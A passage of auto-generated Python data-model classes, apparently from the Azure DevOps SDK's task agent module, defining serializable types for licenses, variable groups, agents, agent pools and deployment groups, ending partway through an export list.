self.friendly_name = friendly_name
self.icon_url = icon_url
self.id = id
self.inputs = inputs
self.instance_name_format = instance_name_format
self.name = name
self.parent_definition_id = parent_definition_id
self.revision = revision
self.runs_on = runs_on
self.tasks = tasks
self.version = version
class TaskHubLicenseDetails(Model):
"""
:param enterprise_users_count:
:type enterprise_users_count: int
:param failed_to_reach_all_providers:
:type failed_to_reach_all_providers: bool
:param free_hosted_license_count:
:type free_hosted_license_count: int
:param free_license_count:
:type free_license_count: int
:param has_license_count_ever_updated:
:type has_license_count_ever_updated: bool
:param hosted_agent_minutes_free_count:
:type hosted_agent_minutes_free_count: int
:param hosted_agent_minutes_used_count:
:type hosted_agent_minutes_used_count: int
:param hosted_licenses_are_premium:
:type hosted_licenses_are_premium: bool
:param marketplace_purchased_hosted_licenses:
:type marketplace_purchased_hosted_licenses: list of :class:`MarketplacePurchasedLicense <azure.devops.v5_1.task_agent.models.MarketplacePurchasedLicense>`
:param msdn_users_count:
:type msdn_users_count: int
:param purchased_hosted_license_count: Microsoft-hosted licenses purchased from VSTS directly.
:type purchased_hosted_license_count: int
:param purchased_license_count: Self-hosted licenses purchased from VSTS directly.
:type purchased_license_count: int
:param total_hosted_license_count:
:type total_hosted_license_count: int
:param total_license_count:
:type total_license_count: int
:param total_private_license_count:
:type total_private_license_count: int
"""
_attribute_map = {
'enterprise_users_count': {'key': 'enterpriseUsersCount', 'type': 'int'},
'failed_to_reach_all_providers': {'key': 'failedToReachAllProviders', 'type': 'bool'},
'free_hosted_license_count': {'key': 'freeHostedLicenseCount', 'type': 'int'},
'free_license_count': {'key': 'freeLicenseCount', 'type': 'int'},
'has_license_count_ever_updated': {'key': 'hasLicenseCountEverUpdated', 'type': 'bool'},
'hosted_agent_minutes_free_count': {'key': 'hostedAgentMinutesFreeCount', 'type': 'int'},
'hosted_agent_minutes_used_count': {'key': 'hostedAgentMinutesUsedCount', 'type': 'int'},
'hosted_licenses_are_premium': {'key': 'hostedLicensesArePremium', 'type': 'bool'},
'marketplace_purchased_hosted_licenses': {'key': 'marketplacePurchasedHostedLicenses', 'type': '[MarketplacePurchasedLicense]'},
'msdn_users_count': {'key': 'msdnUsersCount', 'type': 'int'},
'purchased_hosted_license_count': {'key': 'purchasedHostedLicenseCount', 'type': 'int'},
'purchased_license_count': {'key': 'purchasedLicenseCount', 'type': 'int'},
'total_hosted_license_count': {'key': 'totalHostedLicenseCount', 'type': 'int'},
'total_license_count': {'key': 'totalLicenseCount', 'type': 'int'},
'total_private_license_count': {'key': 'totalPrivateLicenseCount', 'type': 'int'}
}
def __init__(self, enterprise_users_count=None, failed_to_reach_all_providers=None, free_hosted_license_count=None, free_license_count=None, has_license_count_ever_updated=None, hosted_agent_minutes_free_count=None, hosted_agent_minutes_used_count=None, hosted_licenses_are_premium=None, marketplace_purchased_hosted_licenses=None, msdn_users_count=None, purchased_hosted_license_count=None, purchased_license_count=None, total_hosted_license_count=None, total_license_count=None, total_private_license_count=None):
super(TaskHubLicenseDetails, self).__init__()
self.enterprise_users_count = enterprise_users_count
self.failed_to_reach_all_providers = failed_to_reach_all_providers
self.free_hosted_license_count = free_hosted_license_count
self.free_license_count = free_license_count
self.has_license_count_ever_updated = has_license_count_ever_updated
self.hosted_agent_minutes_free_count = hosted_agent_minutes_free_count
self.hosted_agent_minutes_used_count = hosted_agent_minutes_used_count
self.hosted_licenses_are_premium = hosted_licenses_are_premium
self.marketplace_purchased_hosted_licenses = marketplace_purchased_hosted_licenses
self.msdn_users_count = msdn_users_count
self.purchased_hosted_license_count = purchased_hosted_license_count
self.purchased_license_count = purchased_license_count
self.total_hosted_license_count = total_hosted_license_count
self.total_license_count = total_license_count
self.total_private_license_count = total_private_license_count
class TaskInputDefinitionBase(Model):
"""
:param aliases:
:type aliases: list of str
:param default_value:
:type default_value: str
:param group_name:
:type group_name: str
:param help_mark_down:
:type help_mark_down: str
:param label:
:type label: str
:param name:
:type name: str
:param options:
:type options: dict
:param properties:
:type properties: dict
:param required:
:type required: bool
:param type:
:type type: str
:param validation:
:type validation: :class:`TaskInputValidation <azure.devops.v5_1.microsoft._team_foundation._distributed_task._common._contracts.models.TaskInputValidation>`
:param visible_rule:
:type visible_rule: str
"""
_attribute_map = {
'aliases': {'key': 'aliases', 'type': '[str]'},
'default_value': {'key': 'defaultValue', 'type': 'str'},
'group_name': {'key': 'groupName', 'type': 'str'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'label': {'key': 'label', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'options': {'key': 'options', 'type': '{str}'},
'properties': {'key': 'properties', 'type': '{str}'},
'required': {'key': 'required', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'validation': {'key': 'validation', 'type': 'TaskInputValidation'},
'visible_rule': {'key': 'visibleRule', 'type': 'str'}
}
def __init__(self, aliases=None, default_value=None, group_name=None, help_mark_down=None, label=None, name=None, options=None, properties=None, required=None, type=None, validation=None, visible_rule=None):
super(TaskInputDefinitionBase, self).__init__()
self.aliases = aliases
self.default_value = default_value
self.group_name = group_name
self.help_mark_down = help_mark_down
self.label = label
self.name = name
self.options = options
self.properties = properties
self.required = required
self.type = type
self.validation = validation
self.visible_rule = visible_rule
class TaskInputValidation(Model):
"""
:param expression: Conditional expression
:type expression: str
:param message: Message explaining how user can correct if validation fails
:type message: str
"""
_attribute_map = {
'expression': {'key': 'expression', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'}
}
def __init__(self, expression=None, message=None):
super(TaskInputValidation, self).__init__()
self.expression = expression
self.message = message
class TaskOrchestrationOwner(Model):
"""
:param _links:
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.task_agent.models.ReferenceLinks>`
:param id:
:type id: int
:param name:
:type name: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, _links=None, id=None, name=None):
super(TaskOrchestrationOwner, self).__init__()
self._links = _links
self.id = id
self.name = name
class TaskOutputVariable(Model):
"""
:param description:
:type description: str
:param name:
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(TaskOutputVariable, self).__init__()
self.description = description
self.name = name
class TaskPackageMetadata(Model):
"""
:param type: Gets the name of the package.
:type type: str
:param url: Gets the url of the package.
:type url: str
:param version: Gets the version of the package.
:type version: str
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'}
}
def __init__(self, type=None, url=None, version=None):
super(TaskPackageMetadata, self).__init__()
self.type = type
self.url = url
self.version = version
class TaskReference(Model):
"""
:param id:
:type id: str
:param inputs:
:type inputs: dict
:param name:
:type name: str
:param version:
:type version: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '{str}'},
'name': {'key': 'name', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'}
}
def __init__(self, id=None, inputs=None, name=None, version=None):
super(TaskReference, self).__init__()
self.id = id
self.inputs = inputs
self.name = name
self.version = version
class TaskSourceDefinitionBase(Model):
"""
:param auth_key:
:type auth_key: str
:param endpoint:
:type endpoint: str
:param key_selector:
:type key_selector: str
:param selector:
:type selector: str
:param target:
:type target: str
"""
_attribute_map = {
'auth_key': {'key': 'authKey', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'str'},
'key_selector': {'key': 'keySelector', 'type': 'str'},
'selector': {'key': 'selector', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'}
}
def __init__(self, auth_key=None, endpoint=None, key_selector=None, selector=None, target=None):
super(TaskSourceDefinitionBase, self).__init__()
self.auth_key = auth_key
self.endpoint = endpoint
self.key_selector = key_selector
self.selector = selector
self.target = target
class TaskVersion(Model):
"""
:param is_test:
:type is_test: bool
:param major:
:type major: int
:param minor:
:type minor: int
:param patch:
:type patch: int
"""
_attribute_map = {
'is_test': {'key': 'isTest', 'type': 'bool'},
'major': {'key': 'major', 'type': 'int'},
'minor': {'key': 'minor', 'type': 'int'},
'patch': {'key': 'patch', 'type': 'int'}
}
def __init__(self, is_test=None, major=None, minor=None, patch=None):
super(TaskVersion, self).__init__()
self.is_test = is_test
self.major = major
self.minor = minor
self.patch = patch
class ValidationItem(Model):
"""
:param is_valid: Tells whether the current input is valid or not
:type is_valid: bool
:param reason: Reason for input validation failure
:type reason: str
:param type: Type of validation item
:type type: str
:param value: Value to validate. The conditional expression to validate for the input for "expression" type Eg:eq(variables['Build.SourceBranch'], 'refs/heads/master');eq(value, 'refs/heads/master')
:type value: str
"""
_attribute_map = {
'is_valid': {'key': 'isValid', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, is_valid=None, reason=None, type=None, value=None):
super(ValidationItem, self).__init__()
self.is_valid = is_valid
self.reason = reason
self.type = type
self.value = value
class VariableGroup(Model):
"""
A variable group is a collection of related variables.
:param created_by: Gets or sets the identity who created the variable group.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on: Gets or sets the time when variable group was created.
:type created_on: datetime
:param description: Gets or sets description of the variable group.
:type description: str
:param id: Gets or sets id of the variable group.
:type id: int
:param is_shared: Indicates whether variable group is shared with other projects or not.
:type is_shared: bool
:param modified_by: Gets or sets the identity who modified the variable group.
:type modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param modified_on: Gets or sets the time when variable group was modified
:type modified_on: datetime
:param name: Gets or sets name of the variable group.
:type name: str
:param provider_data: Gets or sets provider data.
:type provider_data: :class:`VariableGroupProviderData <azure.devops.v5_1.task_agent.models.VariableGroupProviderData>`
:param type: Gets or sets type of the variable group.
:type type: str
:param variables: Gets or sets variables contained in the variable group.
:type variables: dict
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'is_shared': {'key': 'isShared', 'type': 'bool'},
'modified_by': {'key': 'modifiedBy', 'type': 'IdentityRef'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'provider_data': {'key': 'providerData', 'type': 'VariableGroupProviderData'},
'type': {'key': 'type', 'type': 'str'},
'variables': {'key': 'variables', 'type': '{VariableValue}'}
}
def __init__(self, created_by=None, created_on=None, description=None, id=None, is_shared=None, modified_by=None, modified_on=None, name=None, provider_data=None, type=None, variables=None):
super(VariableGroup, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.description = description
self.id = id
self.is_shared = is_shared
self.modified_by = modified_by
self.modified_on = modified_on
self.name = name
self.provider_data = provider_data
self.type = type
self.variables = variables
class VariableGroupParameters(Model):
"""
:param description: Sets description of the variable group.
:type description: str
:param name: Sets name of the variable group.
:type name: str
:param provider_data: Sets provider data.
:type provider_data: :class:`VariableGroupProviderData <azure.devops.v5_1.task_agent.models.VariableGroupProviderData>`
:param type: Sets type of the variable group.
:type type: str
:param variables: Sets variables contained in the variable group.
:type variables: dict
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'provider_data': {'key': 'providerData', 'type': 'VariableGroupProviderData'},
'type': {'key': 'type', 'type': 'str'},
'variables': {'key': 'variables', 'type': '{VariableValue}'}
}
def __init__(self, description=None, name=None, provider_data=None, type=None, variables=None):
super(VariableGroupParameters, self).__init__()
self.description = description
self.name = name
self.provider_data = provider_data
self.type = type
self.variables = variables
class VariableGroupProviderData(Model):
"""
Defines provider data of the variable group.
"""
_attribute_map = {
}
def __init__(self):
super(VariableGroupProviderData, self).__init__()
class VariableValue(Model):
"""
:param is_secret:
:type is_secret: bool
:param value:
:type value: str
"""
_attribute_map = {
'is_secret': {'key': 'isSecret', 'type': 'bool'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, is_secret=None, value=None):
super(VariableValue, self).__init__()
self.is_secret = is_secret
self.value = value
class VirtualMachine(Model):
"""
:param agent:
:type agent: :class:`TaskAgent <azure.devops.v5_1.task_agent.models.TaskAgent>`
:param id:
:type id: int
:param tags:
:type tags: list of str
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgent'},
'id': {'key': 'id', 'type': 'int'},
'tags': {'key': 'tags', 'type': '[str]'}
}
def __init__(self, agent=None, id=None, tags=None):
super(VirtualMachine, self).__init__()
self.agent = agent
self.id = id
self.tags = tags
class VirtualMachineGroup(EnvironmentResource):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param environment_reference:
:type environment_reference: :class:`EnvironmentReference <azure.devops.v5_1.task_agent.models.EnvironmentReference>`
:param id:
:type id: int
:param last_modified_by:
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on:
:type last_modified_on: datetime
:param name:
:type name: str
:param type: Environment resource type
:type type: object
:param pool_id:
:type pool_id: int
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'environment_reference': {'key': 'environmentReference', 'type': 'EnvironmentReference'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'},
'pool_id': {'key': 'poolId', 'type': 'int'}
}
def __init__(self, created_by=None, created_on=None, environment_reference=None, id=None, last_modified_by=None, last_modified_on=None, name=None, type=None, pool_id=None):
super(VirtualMachineGroup, self).__init__(created_by=created_by, created_on=created_on, environment_reference=environment_reference, id=id, last_modified_by=last_modified_by, last_modified_on=last_modified_on, name=name, type=type)
self.pool_id = pool_id
class VirtualMachineGroupCreateParameters(Model):
"""
:param name:
:type name: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, name=None):
super(VirtualMachineGroupCreateParameters, self).__init__()
self.name = name
class DataSourceBinding(DataSourceBindingBase):
"""
:param callback_context_template: Pagination format supported by this data source(ContinuationToken/SkipTop).
:type callback_context_template: str
:param callback_required_template: Subsequent calls needed?
:type callback_required_template: str
:param data_source_name: Gets or sets the name of the data source.
:type data_source_name: str
:param endpoint_id: Gets or sets the endpoint Id.
:type endpoint_id: str
:param endpoint_url: Gets or sets the url of the service endpoint.
:type endpoint_url: str
:param headers: Gets or sets the authorization headers.
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param initial_context_template: Defines the initial value of the query params
:type initial_context_template: str
:param parameters: Gets or sets the parameters for the data source.
:type parameters: dict
:param request_content: Gets or sets http request body
:type request_content: str
:param request_verb: Gets or sets http request verb
:type request_verb: str
:param result_selector: Gets or sets the result selector.
:type result_selector: str
:param result_template: Gets or sets the result template.
:type result_template: str
:param target: Gets or sets the target of the data source.
:type target: str
"""
_attribute_map = {
'callback_context_template': {'key': 'callbackContextTemplate', 'type': 'str'},
'callback_required_template': {'key': 'callbackRequiredTemplate', 'type': 'str'},
'data_source_name': {'key': 'dataSourceName', 'type': 'str'},
'endpoint_id': {'key': 'endpointId', 'type': 'str'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'initial_context_template': {'key': 'initialContextTemplate', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{str}'},
'request_content': {'key': 'requestContent', 'type': 'str'},
'request_verb': {'key': 'requestVerb', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'},
'result_template': {'key': 'resultTemplate', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(self, callback_context_template=None, callback_required_template=None, data_source_name=None, endpoint_id=None, endpoint_url=None, headers=None, initial_context_template=None, parameters=None, request_content=None, request_verb=None, result_selector=None, result_template=None, target=None):
super(DataSourceBinding, self).__init__(callback_context_template=callback_context_template, callback_required_template=callback_required_template, data_source_name=data_source_name, endpoint_id=endpoint_id, endpoint_url=endpoint_url, headers=headers, initial_context_template=initial_context_template, parameters=parameters, request_content=request_content, request_verb=request_verb, result_selector=result_selector, result_template=result_template, target=target)
class DeploymentGroup(DeploymentGroupReference):
"""
Deployment group.
:param id: Deployment group identifier.
:type id: int
:param name: Name of the deployment group.
:type name: str
:param pool: Deployment pool in which deployment agents are registered.
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project: Project to which the deployment group belongs.
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
:param description: Description of the deployment group.
:type description: str
:param machine_count: Number of deployment targets in the deployment group.
:type machine_count: int
:param machines: List of deployment targets in the deployment group.
:type machines: list of :class:`DeploymentMachine <azure.devops.v5_1.task_agent.models.DeploymentMachine>`
:param machine_tags: List of unique tags across all deployment targets in the deployment group.
:type machine_tags: list of str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'},
'description': {'key': 'description', 'type': 'str'},
'machine_count': {'key': 'machineCount', 'type': 'int'},
'machines': {'key': 'machines', 'type': '[DeploymentMachine]'},
'machine_tags': {'key': 'machineTags', 'type': '[str]'}
}
def __init__(self, id=None, name=None, pool=None, project=None, description=None, machine_count=None, machines=None, machine_tags=None):
super(DeploymentGroup, self).__init__(id=id, name=name, pool=pool, project=project)
self.description = description
self.machine_count = machine_count
self.machines = machines
self.machine_tags = machine_tags
class DeploymentMachineGroup(DeploymentMachineGroupReference):
"""
:param id:
:type id: int
:param name:
:type name: str
:param pool:
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project:
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
:param machines:
:type machines: list of :class:`DeploymentMachine <azure.devops.v5_1.task_agent.models.DeploymentMachine>`
:param size:
:type size: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'},
'machines': {'key': 'machines', 'type': '[DeploymentMachine]'},
'size': {'key': 'size', 'type': 'int'}
}
def __init__(self, id=None, name=None, pool=None, project=None, machines=None, size=None):
super(DeploymentMachineGroup, self).__init__(id=id, name=name, pool=pool, project=project)
self.machines = machines
self.size = size
class TaskAgent(TaskAgentReference):
"""
A task agent.
:param _links:
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.task_agent.models.ReferenceLinks>`
:param access_point: This agent's access point.
:type access_point: str
:param enabled: Whether or not this agent should run jobs.
:type enabled: bool
:param id: Identifier of the agent.
:type id: int
:param name: Name of the agent.
:type name: str
:param os_description: Agent OS.
:type os_description: str
:param provisioning_state: Provisioning state of this agent.
:type provisioning_state: str
:param status: Whether or not the agent is online.
:type status: object
:param version: Agent version.
:type version: str
:param assigned_agent_cloud_request: The agent cloud request that's currently associated with this agent.
:type assigned_agent_cloud_request: :class:`TaskAgentCloudRequest <azure.devops.v5_1.task_agent.models.TaskAgentCloudRequest>`
:param assigned_request: The request which is currently assigned to this agent.
:type assigned_request: :class:`TaskAgentJobRequest <azure.devops.v5_1.task_agent.models.TaskAgentJobRequest>`
:param authorization: Authorization information for this agent.
:type authorization: :class:`TaskAgentAuthorization <azure.devops.v5_1.task_agent.models.TaskAgentAuthorization>`
:param created_on: Date on which this agent was created.
:type created_on: datetime
:param last_completed_request: The last request which was completed by this agent.
:type last_completed_request: :class:`TaskAgentJobRequest <azure.devops.v5_1.task_agent.models.TaskAgentJobRequest>`
:param max_parallelism: Maximum job parallelism allowed for this agent.
:type max_parallelism: int
:param pending_update: Pending update for this agent.
:type pending_update: :class:`TaskAgentUpdate <azure.devops.v5_1.task_agent.models.TaskAgentUpdate>`
:param properties:
:type properties: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param status_changed_on: Date on which the last connectivity status change occurred.
:type status_changed_on: datetime
:param system_capabilities:
:type system_capabilities: dict
:param user_capabilities:
:type user_capabilities: dict
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'access_point': {'key': 'accessPoint', 'type': 'str'},
'enabled': {'key': 'enabled', 'type': 'bool'},
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'os_description': {'key': 'osDescription', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'version': {'key': 'version', 'type': 'str'},
'assigned_agent_cloud_request': {'key': 'assignedAgentCloudRequest', 'type': 'TaskAgentCloudRequest'},
'assigned_request': {'key': 'assignedRequest', 'type': 'TaskAgentJobRequest'},
'authorization': {'key': 'authorization', 'type': 'TaskAgentAuthorization'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'last_completed_request': {'key': 'lastCompletedRequest', 'type': 'TaskAgentJobRequest'},
'max_parallelism': {'key': 'maxParallelism', 'type': 'int'},
'pending_update': {'key': 'pendingUpdate', 'type': 'TaskAgentUpdate'},
'properties': {'key': 'properties', 'type': 'object'},
'status_changed_on': {'key': 'statusChangedOn', 'type': 'iso-8601'},
'system_capabilities': {'key': 'systemCapabilities', 'type': '{str}'},
'user_capabilities': {'key': 'userCapabilities', 'type': '{str}'}
}
def __init__(self, _links=None, access_point=None, enabled=None, id=None, name=None, os_description=None, provisioning_state=None, status=None, version=None, assigned_agent_cloud_request=None, assigned_request=None, authorization=None, created_on=None, last_completed_request=None, max_parallelism=None, pending_update=None, properties=None, status_changed_on=None, system_capabilities=None, user_capabilities=None):
super(TaskAgent, self).__init__(_links=_links, access_point=access_point, enabled=enabled, id=id, name=name, os_description=os_description, provisioning_state=provisioning_state, status=status, version=version)
self.assigned_agent_cloud_request = assigned_agent_cloud_request
self.assigned_request = assigned_request
self.authorization = authorization
self.created_on = created_on
self.last_completed_request = last_completed_request
self.max_parallelism = max_parallelism
self.pending_update = pending_update
self.properties = properties
self.status_changed_on = status_changed_on
self.system_capabilities = system_capabilities
self.user_capabilities = user_capabilities
class TaskAgentPool(TaskAgentPoolReference):
"""
An organization-level grouping of agents.
:param id:
:type id: int
:param is_hosted: Gets or sets a value indicating whether or not this pool is managed by the service.
:type is_hosted: bool
:param is_legacy: Determines whether the pool is legacy.
:type is_legacy: bool
:param name:
:type name: str
:param pool_type: Gets or sets the type of the pool
:type pool_type: object
:param scope:
:type scope: str
:param size: Gets the current size of the pool.
:type size: int
:param agent_cloud_id: The ID of the associated agent cloud.
:type agent_cloud_id: int
:param auto_provision: Whether or not a queue should be automatically provisioned for each project collection.
:type auto_provision: bool
:param auto_size: Whether or not the pool should autosize itself based on the Agent Cloud Provider settings.
:type auto_size: bool
:param created_by: Creator of the pool. The creator of the pool is automatically added into the administrators group for the pool on creation.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on: The date/time of the pool creation.
:type created_on: datetime
:param owner: Owner or administrator of the pool.
:type owner: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param properties:
:type properties: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param target_size: Target parallelism.
:type target_size: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'is_hosted': {'key': 'isHosted', 'type': 'bool'},
'is_legacy': {'key': 'isLegacy', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'pool_type': {'key': 'poolType', 'type': 'object'},
'scope': {'key': 'scope', 'type': 'str'},
'size': {'key': 'size', 'type': 'int'},
'agent_cloud_id': {'key': 'agentCloudId', 'type': 'int'},
'auto_provision': {'key': 'autoProvision', 'type': 'bool'},
'auto_size': {'key': 'autoSize', 'type': 'bool'},
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'owner': {'key': 'owner', 'type': 'IdentityRef'},
'properties': {'key': 'properties', 'type': 'object'},
'target_size': {'key': 'targetSize', 'type': 'int'}
}
def __init__(self, id=None, is_hosted=None, is_legacy=None, name=None, pool_type=None, scope=None, size=None, agent_cloud_id=None, auto_provision=None, auto_size=None, created_by=None, created_on=None, owner=None, properties=None, target_size=None):
super(TaskAgentPool, self).__init__(id=id, is_hosted=is_hosted, is_legacy=is_legacy, name=name, pool_type=pool_type, scope=scope, size=size)
self.agent_cloud_id = agent_cloud_id
self.auto_provision = auto_provision
self.auto_size = auto_size
self.created_by = created_by
self.created_on = created_on
self.owner = owner
self.properties = properties
self.target_size = target_size
class TaskInputDefinition(TaskInputDefinitionBase):
"""
:param aliases:
:type aliases: list of str
:param default_value:
:type default_value: str
:param group_name:
:type group_name: str
:param help_mark_down:
:type help_mark_down: str
:param label:
:type label: str
:param name:
:type name: str
:param options:
:type options: dict
:param properties:
:type properties: dict
:param required:
:type required: bool
:param type:
:type type: str
:param validation:
:type validation: :class:`TaskInputValidation <azure.devops.v5_1.task_agent.models.TaskInputValidation>`
:param visible_rule:
:type visible_rule: str
"""
_attribute_map = {
'aliases': {'key': 'aliases', 'type': '[str]'},
'default_value': {'key': 'defaultValue', 'type': 'str'},
'group_name': {'key': 'groupName', 'type': 'str'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'label': {'key': 'label', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'options': {'key': 'options', 'type': '{str}'},
'properties': {'key': 'properties', 'type': '{str}'},
'required': {'key': 'required', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'validation': {'key': 'validation', 'type': 'TaskInputValidation'},
'visible_rule': {'key': 'visibleRule', 'type': 'str'},
}
def __init__(self, aliases=None, default_value=None, group_name=None, help_mark_down=None, label=None, name=None, options=None, properties=None, required=None, type=None, validation=None, visible_rule=None):
super(TaskInputDefinition, self).__init__(aliases=aliases, default_value=default_value, group_name=group_name, help_mark_down=help_mark_down, label=label, name=name, options=options, properties=properties, required=required, type=type, validation=validation, visible_rule=visible_rule)
class TaskSourceDefinition(TaskSourceDefinitionBase):
"""
:param auth_key:
:type auth_key: str
:param endpoint:
:type endpoint: str
:param key_selector:
:type key_selector: str
:param selector:
:type selector: str
:param target:
:type target: str
"""
_attribute_map = {
'auth_key': {'key': 'authKey', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'str'},
'key_selector': {'key': 'keySelector', 'type': 'str'},
'selector': {'key': 'selector', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(self, auth_key=None, endpoint=None, key_selector=None, selector=None, target=None):
super(TaskSourceDefinition, self).__init__(auth_key=auth_key, endpoint=endpoint, key_selector=key_selector, selector=selector, target=target)
__all__ = [
'AadOauthTokenRequest',
'AadOauthTokenResult',
'AuthenticationSchemeReference',
'AuthorizationHeader',
'AzureManagementGroup',
'AzureManagementGroupQueryResult',
'AzureSubscription',
'AzureSubscriptionQueryResult',
'ClientCertificate',
'DataSource',
'DataSourceBindingBase',
'DataSourceDetails',
'DependencyBinding',
'DependencyData',
'DependsOn',
'DeploymentGroupCreateParameter',
'DeploymentGroupCreateParameterPoolProperty',
'DeploymentGroupMetrics',
'DeploymentGroupReference',
'DeploymentGroupUpdateParameter',
'DeploymentMachine',
'DeploymentMachineGroupReference',
'DeploymentPoolSummary',
'DeploymentTargetUpdateParameter',
'EndpointAuthorization',
'EndpointUrl',
'EnvironmentCreateParameter',
'EnvironmentDeploymentExecutionRecord',
'EnvironmentInstance',
'EnvironmentReference',
'EnvironmentResource',
'EnvironmentResourceReference',
'EnvironmentUpdateParameter',
'GraphSubjectBase',
'HelpLink',
'IdentityRef',
'InputDescriptor',
'InputValidation',
'InputValidationRequest',
'InputValue',
'InputValues',
'InputValuesError',
'KubernetesResource',
'KubernetesResourceCreateParameters',
'MarketplacePurchasedLicense',
'MetricsColumnMetaData',
'MetricsColumnsHeader',
'MetricsRow',
'PackageMetadata',
'PackageVersion',
'ProjectReference',
'PublishTaskGroupMetadata',
'ReferenceLinks',
'ResourceLimit',
'ResourceUsage',
'ResultTransformationDetails',
'SecureFile',
'ServiceEndpoint',
'ServiceEndpointAuthenticationScheme',
'ServiceEndpointDetails',
'ServiceEndpointExecutionData',
'ServiceEndpointExecutionRecord',
'ServiceEndpointExecutionRecordsInput',
'ServiceEndpointRequest',
'ServiceEndpointRequestResult',
'ServiceEndpointType',
'TaskAgentAuthorization',
'TaskAgentCloud',
'TaskAgentCloudRequest',
'TaskAgentCloudType',
'TaskAgentDelaySource',
'TaskAgentJobRequest',
'TaskAgentMessage',
'TaskAgentPoolMaintenanceDefinition',
'TaskAgentPoolMaintenanceJob',
'TaskAgentPoolMaintenanceJobTargetAgent',
'TaskAgentPoolMaintenanceOptions',
'TaskAgentPoolMaintenanceRetentionPolicy',
'TaskAgentPoolMaintenanceSchedule',
'TaskAgentPoolReference',
'TaskAgentPublicKey',
'TaskAgentQueue',
'TaskAgentReference',
'TaskAgentSession',
'TaskAgentSessionKey',
'TaskAgentUpdate',
'TaskAgentUpdateReason',
'TaskDefinition',
'TaskDefinitionEndpoint',
'TaskDefinitionReference',
